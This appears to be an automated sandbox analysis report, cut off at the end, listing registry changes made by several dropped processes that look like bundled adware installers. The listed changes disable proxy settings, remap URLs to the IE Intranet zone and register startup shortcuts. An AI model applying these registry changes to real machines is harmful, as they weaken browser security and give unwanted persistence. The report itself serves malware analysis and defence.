[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process FHSev.exe:2280 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 00 E4 77 A1 A4 D4 1F DD B6 42 6F 16 E8 E2 53"

The process FHSev.exe:2212 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E CA A4 D3 97 1B 0F 31 A7 D6 25 C2 E1 F2 89 95"

The process FHSev.exe:2328 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F AD EA 35 C9 01 7F 3C B9 55 EF 98 F8 B0 F0 D1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process FHSev.exe:968 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 1D 36 16 62 50 F6 16 91 B5 69 20 8E 55 A2 44"

The process AlmDayQuick.exe:2908 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 20 C5 BF 05 81 00 35 46 8C 00 02 56 AD 90 34"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

The process Application Dataypfbyfgmr.tmp:2860 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 79 74 AA 83 B5 3D B6 46 AE E0 79 9B E1 B5 16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process juese.exe:2488 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1404370428"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CachePrefix" = ":2014091820140919:"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "juese.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{871C5380-42A0-1069-A2EA-08002B30309D}" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 03 80 96 1A F7 90 AF 11 E3 A0 B3 65 83 14 4F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014091820140919\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014091820140919]
"CacheLimit" = "8192"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sjss_jing_zhimeng_217.exe:1724 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\速捷搜索]
"Publisher" = "sjss.inc"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\sjss.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\速捷搜索]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\sjss]
"sjss.exe" = "sjss"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 05 B4 1C 20 E9 29 1F 71 5D 20 1D 06 4E 5B 9B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\速捷搜索]
"DisplayName" = "速捷搜索"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\速捷搜索]
"DisplayVersion" = "1.0.0.4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sjss.exe:216 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 D7 00 3C FE 02 4C 47 4F FC 83 5C EC 27 F7 E1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process a-zm-157391-v5.exe:2236 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绝色唐门]
"DisplayVersion" = "1.1.0.3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"OfficeAssist.0195.80.1015.exe" = "Kingsoft Install Application"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 27 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绝色唐门]
"UninstallString" = "%Program Files%\jstm\unist.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绝色唐门]
"DisplayName" = "绝色唐门"
"Publisher" = ""
"DisplayIcon" = "%Program Files%\jstm\juese.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{871C5380-42A0-1069-A2EA-08002B30309D}" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Almanac_clnh_2014.8.3._126cl.exe" = "今日黄历 安装向导"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 F4 52 49 4B A9 DF 4D A4 AB 50 57 F7 8D B6 53"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process setup_2949-14598.exe:612 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D BD 41 70 CA FF 35 65 37 34 6F 50 2E BC A6 FB"

The process OfficeAssist.0195.80.1015.exe:1628 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 0E DE 87 4F 56 E0 DD E4 B5 D1 11 5D 8C 9A DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk, \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\1.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\10.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\100.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\101.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\102.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\103.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\104.png, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\11.png, , 